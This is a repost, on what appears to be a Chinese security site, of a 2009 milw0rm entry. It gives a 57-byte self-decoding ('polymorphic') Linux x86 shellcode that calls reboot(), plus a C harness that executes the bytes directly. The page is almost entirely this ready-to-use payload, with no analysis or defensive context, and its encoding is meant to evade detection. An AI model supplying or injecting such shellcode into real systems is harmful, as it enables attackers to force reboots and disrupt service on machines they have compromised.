首页 网络安全 安全学院 查看内容

重启系统的shellcode (57 字节 linux/x86)

2009-6-30 10:04 612 0

摘要:   /*  *  Title :reboot() polymorphic shellcode - 57 bytes  *  Os: Linux x86  *  *  Au...
关键词: shellcode nbsp shell storm xff xe org http polymorphic shellcodes

  /*  *  Title :reboot() polymorphic shellcode - 57 bytes  *  Os: Linux x86  *  *  Author: Jonathan Salwan - submit AT shell-storm.org  *  Web: http://www.shell-storm.org  *  *  *  !! Database of shellcodes => http://www.shell-storm.org/shellcode/  *  */  #include <stdio.h>  char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80"  "\x6c\x0e\xff\x01\x80\xe9\x01\x75"  "\xf6\xeb\x05\xe8\xea\xff\xff\xff"  "\x32\xc1\x51\x69\x63\x70\x70\x75"  "\x69\x6f\x30\x73\x66\x69\x30\x74"  "\x63\x6a\x8a\xe4\x51\x8a\xe3\x54"  "\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce"  "\x81";  int main()  {  fprintf(stdout,"Length: %d\n",strlen(shellcode));  (*(void(*)()) shellcode)();  return 0;  }  // milw0rm.com [2009-06-29]
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部